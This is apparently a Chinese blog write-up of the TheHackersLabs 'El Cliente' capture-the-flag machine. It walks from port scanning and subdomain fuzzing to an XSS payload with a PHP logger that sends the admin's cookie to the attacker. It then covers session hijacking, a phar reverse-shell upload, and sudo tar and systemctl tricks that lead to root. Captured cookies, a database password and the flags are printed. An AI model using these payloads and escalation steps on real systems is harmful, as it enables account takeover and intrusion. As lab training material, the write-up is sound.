Pepster'Blog
TheHackersLabs-El Cliente靶机详解WP
城南花已开 Lv5
  2025-01-17 15:24:37   2025-01-22 19:49:12    2.2k 字  12 分钟  

信息收集

服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.157  08:00:27:91:d5:1e       (Unknown)
192.168.60.254  00:50:56:e0:e6:12       (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.974 seconds (129.69 hosts/sec). 4 responded
export ip=192.168.60.157
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.157:22
Open 192.168.60.157:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-17 15:26 CST
Initiating ARP Ping Scan at 15:26
Scanning 192.168.60.157 [1 port]
Completed ARP Ping Scan at 15:26, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:26
Completed Parallel DNS resolution of 1 host. at 15:26, 0.03s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:26
Scanning 192.168.60.157 [2 ports]
Discovered open port 80/tcp on 192.168.60.157
Discovered open port 22/tcp on 192.168.60.157
Completed SYN Stealth Scan at 15:26, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.157
Host is up, received arp-response (0.00039s latency).
Scanned at 2025-01-17 15:26:36 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:91:D5:1E (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

编辑一下hosts,添加一个域名

1
2
sudo vim /etc/hosts
192.168.60.157  arka.thl

发现一个联系我们的页面,不过我尝试了一下,好像并没有什么软用

image

子域名模糊测试

尝试模糊测试,其他子域名

发现两个子域名,猜测是管理员登入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
❯ wfuzz -c -u "http://arka.thl" -H "Host: FUZZ.arka.thl" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hw 808
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://arka.thl/
Total requests: 114441

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000024:   302        0 L      0 W        0 Ch        "admin"
000000290:   302        0 L      0 W        0 Ch        "www.admin"
000009532:   400        10 L     35 W       300 Ch      "#www"
000010581:   400        10 L     35 W       300 Ch      "#mail"
000047706:   400        10 L     35 W       300 Ch      "#smtp"

添加进hosts

1
sudo echo "192.168.60.157  arka.thl admin.arka.thl www.admin.arka.thl" >> /etc/hosts

找到一个登入页面,不过我尝试了默认密码,无效,尝试SQL注入也无效

image

不过我觉得还是要在contact那边找一下漏洞,只有这里才有交互,管理员会读取你的请求

反射型XSS注入

猜测有XSS漏洞,大概率是反射型XSS

[PayloadsAllTheThings/XSS 注入/README.md at master · swisskyrepo/PayloadsAllTheThings — PayloadsAllTheThings/XSS Injection/README.md at master · swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS Injection/README.md#data-grabber)

我们可以尝试读取管理员的Cookie

1
<script>document.location='http://localhost/xss.php?c='+document.cookie</script>

你可以创建一个php

1
2
3
4
5
6
<?php
$cookie = $_GET['c'];
$fp = fopen('cookies.txt', 'a+');
fwrite($fp, 'Cookie:' .$cookie."\r\n");
fclose($fp);
?>

这样就可以将收集到的Cookie写入文件image

我用python开一个http,监听一下

发现管理员每分钟都会访问

1
2
3
4
5
6
7
❯ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.60.157 - - [17/Jan/2025 16:10:05] "GET /xss.php?c=PHPSESSID=jdbfr1esetnjob7jfgllb1ve8t HTTP/1.1" 200 -
192.168.60.157 - - [17/Jan/2025 16:11:05] "GET /xss.php?c=PHPSESSID=5huhk49mvq28c6ugtumcio18q6 HTTP/1.1" 200 -
192.168.60.157 - - [17/Jan/2025 16:12:07] "GET /xss.php?c=PHPSESSID=r14llc61uej9b4c6chcf5tub2d HTTP/1.1" 200 -
192.168.60.157 - - [17/Jan/2025 16:13:06] "GET /xss.php?c=PHPSESSID=svf8e58a4fbgnq6b19430bc6l3 HTTP/1.1" 200 -

我们尝试利用这个cookie访问一下admin页面

先去下个浏览器插件Cookie-Editor

改一下cookie,刷新页面就能登入了,前提是不要关闭http服务

image

可以创建一个新的项目,写一个反弹shell

如果你直接上传一个php会限制文件类型的,你改成phar即可

image

可以成功解析文件的

image

用户提权

监听端口即可

拿到两个用户kobe scott

1
2
3
4
5
6
7
8
9
10
11
12
❯ pwncat-cs -lp 4444
[16:26:57] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
[16:26:58] received connection from 192.168.60.157:51526                                                                                    bind.py:84
[16:26:59] 0.0.0.0:4444: normalizing shell path                                                                                         manager.py:957
           0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash                                                                  manager.py:957
[16:27:01] 192.168.60.157:51526: registered new host w/ db                                                                              manager.py:957
(local) pwncat$
(remote) www-data@TheHackersLabs-ElCliente:/var/www$ cat /etc/passwd |grep /bin/bash
root:x:0:0:root:/root:/bin/bash
kobe:x:1000:1000:kobe:/home/kobe:/bin/bash
scott:x:1001:1001:Scott,,,:/home/scott:/bin/bash

同时本地开放了3306端口,在网站根目录下有db配置文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
(remote) www-data@TheHackersLabs-ElCliente:/var/www/html/arka.thl$ ss -luntp
Netid        State          Recv-Q         Send-Q                         Local Address:Port                  Peer Address:Port        Process
udp          UNCONN         0              0                                 127.0.0.54:53                         0.0.0.0:*
udp          UNCONN         0              0                              127.0.0.53%lo:53                         0.0.0.0:*
udp          UNCONN         0              0                      192.168.60.157%enp0s3:68                         0.0.0.0:*
tcp          LISTEN         0              151                                127.0.0.1:3306                       0.0.0.0:*
tcp          LISTEN         0              4096                              127.0.0.54:53                         0.0.0.0:*
tcp          LISTEN         0              4096                           127.0.0.53%lo:53                         0.0.0.0:*
tcp          LISTEN         0              10                                 127.0.0.1:36601                      0.0.0.0:*
tcp          LISTEN         0              70                                 127.0.0.1:33060                      0.0.0.0:*
tcp          LISTEN         0              4096                                       *:22                               *:*
tcp          LISTEN         0              511                                        *:80                               *:*
(remote) www-data@TheHackersLabs-ElCliente:/var/www/html/arka.thl$ cat db.php
<?php
const DB_HOST = '127.0.0.1';
const DB_USER = 'scott';
const DB_PASSWORD = 'gp34cb$ka64tfp10!';
const DB_NAME = 'arka_db';

$mysqli = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);

if (mysqli_error($mysqli)) {
  die('Ocurrio un error al conectarse a la base de datos ' . mysqli_error($mysqli));
}

拿到密码尝试登录一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
(remote) www-data@TheHackersLabs-ElCliente:/var/www/html/arka.thl$ mysql -uscott -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 496
Server version: 8.0.40-0ubuntu0.24.04.1 (Ubuntu)

Copyright (c) 2000, 2024, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show database;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'database' at line 1
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| arka_db            |
| information_schema |
| performance_schema |
+--------------------+
3 rows in set (0.06 sec)

mysql> use arka_db
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-------------------+
| Tables_in_arka_db |
+-------------------+
| messages          |
| projects          |
| users             |
+-------------------+
3 rows in set (0.00 sec)

mysql> select * from users;
+----+----------+--------------------------------------------------------------+
| id | username | password                                                     |
+----+----------+--------------------------------------------------------------+
|  1 | admin    | $2y$10$R1rGblRTFf4aez.0z71svOoGEOLXssZQoBSEGVqcDFVeC5wF1hRsm |
+----+----------+--------------------------------------------------------------+
1 row in set (0.00 sec)

这个hash不用爆破了,出不来的

尝试用mysql的连接密码登入scott用户

kobe用户的sudo 权限,那就正常提权

因为我利用pwncat反弹shell所以PS1会出现乱码,开一个bash的子进程就好了

拿到user了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
(remote) www-data@TheHackersLabs-ElCliente:/var/www/html/arka.thl$ su scott
Password:
(remote) scott@TheHackersLabs-ElCliente:/var/www/html/arka.thl$
(remote) scott@TheHackersLabs-ElCliente:/home/scott$ sudo -l
[sudo] password for scott:
Matching Defaults entries for scott on TheHackersLabs-ElCliente:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User scott may run the following commands on TheHackersLabs-ElCliente:
    (kobe) PASSWD: /usr/bin/tar
(remote) scott@TheHackersLabs-ElCliente:/home/scott$ sudo -u kobe /usr/bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh/usr/bin/tar: Removing leading `/' from member names
\[\](remote)\[\] \[\]kobe@TheHackersLabs-ElCliente\[\]:\[\]/home/scott\[\]$ bash
(remote) kobe@TheHackersLabs-ElCliente:/home/scott$ id
uid=1000(kobe) gid=1000(kobe) groups=1000(kobe)
(remote) kobe@TheHackersLabs-ElCliente:/home/kobe$ cat user.txt
12595a7851c25233e157884a46331355

Root提权

sudo权限

正常利用systemctl,提权即可

1
2
3
4
5
6
7
(remote) kobe@TheHackersLabs-ElCliente:/home/kobe$ sudo -l
Matching Defaults entries for kobe on TheHackersLabs-ElCliente:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User kobe may run the following commands on TheHackersLabs-ElCliente:
    (ALL) NOPASSWD: /bin/systemctl

写一个服务,将bash添加suid权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
(remote) kobe@TheHackersLabs-ElCliente:/home/kobe$ echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > exp.service
(remote) kobe@TheHackersLabs-ElCliente:/home/kobe$ sudo systemctl link /home/kobe/exp.service
Created symlink /etc/systemd/system/exp.service → /home/kobe/exp.service.
(remote) kobe@TheHackersLabs-ElCliente:/home/kobe$ sudo systemctl enable --now /home/kobe/exp.service
Created symlink /etc/systemd/system/multi-user.target.wants/exp.service → /home/kobe/exp.service.
(remote) kobe@TheHackersLabs-ElCliente:/home/kobe$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1446024 Mar 31  2024 /bin/bash
(remote) kobe@TheHackersLabs-ElCliente:/home/kobe$ bash -p
(remote) root@TheHackersLabs-ElCliente:/home/kobe# id
uid=1000(kobe) gid=1000(kobe) euid=0(root) egid=0(root) groups=0(root),1000(kobe)
(remote) root@TheHackersLabs-ElCliente:/home/kobe# whoami
root
(remote) root@TheHackersLabs-ElCliente:/home/kobe# cat /root/root.txt
526c3069f7a4d21d9e2dfb65ba1240c7
  1. 信息收集
    1. 服务探测
    2. 子域名模糊测试
    3. 反射型XSS注入
  2. 用户提权
  3. Root提权
    1. sudo权限
© 2024 - 2025    城南花已开
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 258.9k
  1. 信息收集
    1. 服务探测
    2. 子域名模糊测试
    3. 反射型XSS注入
  2. 用户提权
  3. Root提权
    1. sudo权限